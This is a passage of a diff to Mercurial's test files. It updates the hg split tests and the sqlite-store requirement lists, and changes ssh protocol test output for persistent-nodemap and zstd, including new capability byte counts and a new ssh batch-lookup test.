+ (enter ? for help) [Ynesfdaq?] d
+
+ no changes to record
+ diff --git a/foo b/foo
+ new file mode 100644
+ examine changes to 'foo'?
+ (enter ? for help) [Ynesfdaq?] a
+
+ HG: Splitting ae694b2901bb. Write commit message for the first split changeset.
+ foo
+
+
+ HG: Enter commit message. Lines beginning with 'HG:' are removed.
+ HG: Leave message empty to abort commit.
+ HG: --
+ HG: user: test
+ HG: branch 'default'
+ HG: added foo
+ warning: commit already existed in the repository!
+ $ hg log -G -T'{phase} {rev}:{node|short} {desc}'
+ @ draft 1:ae694b2901bb foo
+ |
+ o public 0:222799e2f90b r0
+
+
+Now try the same thing but modifying the message so we don't trigger the
+identical changeset failures
+
+ $ hg init $TESTTMP/noop2
+ $ cd $TESTTMP/noop2
+ $ echo r0 > r0
+ $ hg ci -qAm r0
+ $ hg phase -p
+ $ echo foo > foo
+ $ hg ci -qAm foo
+ $ hg log -G -T'{phase} {rev}:{node|short} {desc}'
+ @ draft 1:ae694b2901bb foo
+ |
+ o public 0:222799e2f90b r0
+
+ $ cat > $TESTTMP/messages <<EOF
+ > message1
+ > EOF
+ $ printf 'd\na\n' | HGEDITOR="\"$PYTHON\" $TESTTMP/editor.py" hg split
+ diff --git a/foo b/foo
+ new file mode 100644
+ examine changes to 'foo'?
+ (enter ? for help) [Ynesfdaq?] d
+
+ no changes to record
+ diff --git a/foo b/foo
+ new file mode 100644
+ examine changes to 'foo'?
+ (enter ? for help) [Ynesfdaq?] a
+
+ EDITOR: HG: Splitting ae694b2901bb. Write commit message for the first split changeset.
+ EDITOR: foo
+ EDITOR:
+ EDITOR:
+ EDITOR: HG: Enter commit message. Lines beginning with 'HG:' are removed.
+ EDITOR: HG: Leave message empty to abort commit.
+ EDITOR: HG: --
+ EDITOR: HG: user: test
+ EDITOR: HG: branch 'default'
+ EDITOR: HG: added foo
+ created new head
+ saved backup bundle to $TESTTMP/noop2/.hg/strip-backup/ae694b2901bb-28e0b457-split.hg (obsstore-off !)
+ $ hg log -G -T'{phase} {rev}:{node|short} {desc}'
+ @ draft 1:de675559d3f9 message1 (obsstore-off !)
+ @ draft 2:de675559d3f9 message1 (obsstore-on !)
+ |
+ o public 0:222799e2f90b r0
+
+#if obsstore-on
+ $ hg debugobsolete
+ ae694b2901bb8b0f8c4b5e075ddec0d63468d57a de675559d3f93ffc822c6eb7490e5c73033f17c7 0 * (glob)
+#endif
--- a/tests/test-sqlitestore.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-sqlitestore.t Tue Apr 20 11:01:06 2021 -0400
@@ -17,6 +17,8 @@
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -31,6 +33,8 @@
exp-sqlite-comp-001=$BUNDLE2_COMPRESSIONS$ (no-zstd !)
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -49,6 +53,8 @@
exp-sqlite-comp-001=$BUNDLE2_COMPRESSIONS$
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -62,6 +68,8 @@
exp-sqlite-comp-001=none
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/test-ssh-batch.t Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,15 @@
+ $ hg init a
+ $ cd a
+ $ touch a; hg commit -qAm_
+ $ hg bookmark $(for i in $($TESTDIR/seq.py 0 20); do echo b$i; done)
+ $ hg clone . ../b -q
+ $ cd ../b
+
+Checking that when lookup multiple bookmarks in one go, if one of them
+fails (thus causing the sshpeer to be stopped), the errors from the
+further lookups don't result in tracebacks.
+
+ $ hg pull -r b0 -r nosuchbookmark $(for i in $($TESTDIR/seq.py 1 20); do echo -r b$i; done) -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/$(pwd)/../a
+ pulling from ssh://user@dummy/$TESTTMP/b/../a
+ abort: unknown revision 'nosuchbookmark'
+ [255]
--- a/tests/test-ssh-bundle1.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-ssh-bundle1.t Tue Apr 20 11:01:06 2021 -0400
@@ -72,8 +72,10 @@
$ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --stream ssh://user@dummy/remote local-stream
streaming all changes
- 4 files to transfer, 602 bytes of data
- transferred 602 bytes in * seconds (*) (glob)
+ 4 files to transfer, 602 bytes of data (no-zstd !)
+ transferred 602 bytes in * seconds (*) (glob) (no-zstd !)
+ 4 files to transfer, 621 bytes of data (zstd !)
+ transferred 621 bytes in * seconds (* */sec) (glob) (zstd !)
searching for changes
no changes found
updating to branch default
@@ -94,8 +96,10 @@
$ hg -R local-stream book mybook
$ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --stream ssh://user@dummy/local-stream stream2
streaming all changes
- 4 files to transfer, 602 bytes of data
- transferred 602 bytes in * seconds (*) (glob)
+ 4 files to transfer, 602 bytes of data (no-zstd !)
+ transferred 602 bytes in * seconds (*) (glob) (no-zstd !)
+ 4 files to transfer, 621 bytes of data (zstd !)
+ transferred 621 bytes in * seconds (* */sec) (glob) (zstd !)
searching for changes
no changes found
updating to branch default
@@ -482,9 +486,11 @@
sending upgrade request: * proto=exp-ssh-v2-0003 (glob) (sshv2 !)
sending hello command
sending between command
- remote: 463 (sshv1 !)
+ remote: 444 (sshv1 no-rust !)
+ remote: 463 (sshv1 rust !)
protocol upgraded to exp-ssh-v2-0003 (sshv2 !)
- remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-rust !)
+ remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,persistent-nodemap,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (rust !)
remote: 1 (sshv1 !)
sending protocaps command
preparing listkeys for "bookmarks"
--- a/tests/test-ssh-proto-unbundle.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-ssh-proto-unbundle.t Tue Apr 20 11:01:06 2021 -0400
@@ -1,3 +1,10 @@
+persistent-nodemap is not enabled by default. It is not relevant for this test so disable it.
+
+ $ cat << EOF >> $HGRCPATH
+ > [format]
+ > use-persistent-nodemap = no
+ > EOF
+
$ cat > hgrc-sshv2 << EOF
> %include $HGRCPATH
> [experimental]
@@ -56,8 +63,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -109,8 +116,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending unbundle command
@@ -235,8 +242,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -293,8 +300,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending unbundle command
@@ -359,8 +366,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -418,8 +425,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending unbundle command
@@ -485,8 +492,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -543,8 +550,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending unbundle command
@@ -609,8 +616,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -668,8 +675,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending unbundle command
@@ -735,8 +742,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -796,8 +803,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending unbundle command
@@ -865,8 +872,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -923,8 +930,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending unbundle command
@@ -989,8 +996,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1050,8 +1057,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending unbundle command
@@ -1119,8 +1126,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1180,8 +1187,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending unbundle command
@@ -1255,8 +1262,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1314,8 +1321,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending unbundle command
@@ -1382,8 +1389,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1441,8 +1448,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending unbundle command
@@ -1511,8 +1518,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1572,8 +1579,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending unbundle command
@@ -1650,8 +1657,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1715,8 +1722,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending unbundle command
@@ -1788,8 +1795,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1843,8 +1850,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending unbundle command
@@ -1918,8 +1925,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1977,8 +1984,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending unbundle command
--- a/tests/test-ssh-proto.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-ssh-proto.t Tue Apr 20 11:01:06 2021 -0400
@@ -1,5 +1,12 @@
#require no-chg
+persistent-nodemap is not enabled by default. It is not relevant for this test so disable it.
+
+ $ cat << EOF >> $HGRCPATH
+ > [format]
+ > use-persistent-nodemap = no
+ > EOF
+
$ cat > hgrc-sshv2 << EOF
> %include $HGRCPATH
> [experimental]
@@ -64,7 +71,7 @@
devel-peer-request: pairs: 81 bytes
sending hello command
sending between command
- remote: 463
+ remote: 444
remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
remote: 1
devel-peer-request: protocaps
@@ -86,8 +93,8 @@
i> write(6) -> 6:
i> hello\n
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
`hg debugserve --sshstdio` works
@@ -96,7 +103,7 @@
$ hg debugserve --sshstdio << EOF
> hello
> EOF
- 463
+ 444
capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
I/O logging works
@@ -106,24 +113,24 @@
> EOF
e> flush() -> None
o> write(4) -> 4:
- o> 463\n
- o> write(463) -> 463:
+ o> 444\n
+ o> write(444) -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
- 463
+ 444
capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> flush() -> None
$ hg debugserve --sshstdio --logiofile $TESTTMP/io << EOF
> hello
> EOF
- 463
+ 444
capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
$ cat $TESTTMP/io
e> flush() -> None
o> write(4) -> 4:
- o> 463\n
- o> write(463) -> 463:
+ o> 444\n
+ o> write(444) -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> flush() -> None
@@ -149,8 +156,8 @@
i> write(6) -> 6:
i> hello\n
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
i> write(98) -> 98:
i> between\n
@@ -187,7 +194,7 @@
remote: banner: line 7
remote: banner: line 8
remote: banner: line 9
- remote: 463
+ remote: 444
remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
remote: 1
devel-peer-request: protocaps
@@ -245,8 +252,8 @@
o> readline() -> 15:
o> banner: line 9\n
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
i> write(98) -> 98:
i> between\n
@@ -297,12 +304,12 @@
i> write(6) -> 6:
i> hello\n
o> readline() -> 4:
- o> 463\n
+ o> 444\n
i> write(98) -> 98:
i> between\n
i> pairs 81\n
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
- o> readline() -> 463:
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -316,7 +323,7 @@
sending hello command
sending between command
remote: 0
- remote: 463
+ remote: 444
remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
remote: 1
devel-peer-request: protocaps
